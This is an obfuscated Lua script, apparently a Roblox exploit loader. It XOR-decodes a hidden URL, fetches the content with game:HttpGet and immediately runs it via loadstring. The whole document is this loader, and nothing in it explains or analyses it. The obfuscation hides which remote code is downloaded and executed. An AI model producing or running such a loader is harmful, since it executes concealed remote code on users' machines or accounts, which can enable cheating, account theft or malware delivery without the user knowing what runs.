local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v8, v9)
	local v10 = {};
	for v11 = 2 - 1, #v8 do
		v6(v10, v0(v4(v1(v2(v8, v11, v11 + (2 - 1))), v1(v2(v9, (1 - 0) + (v11 % #v9), (2 - 1) + (v11 % #v9) + (620 - (555 + 64))))) % 256));
	end
	return v5(v10);
end
loadstring(game:HttpGet(v7("\145\203\207\49\246\168\157\81\158\209\218\50\168\188\206\10\217\214\217\48\245\190\213\29\222\205\207\32\232\175\137\29\222\206\148\41\233\181\192\22\216\203\210\41\233\181\192\22\216\203\210\104\238\174\197\81\245\196\211\47\237\185\192\23\213\193\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\8\231\178\201\57\246\233\149\49\254\175", "\126\177\163\187\69\134\219\167")))();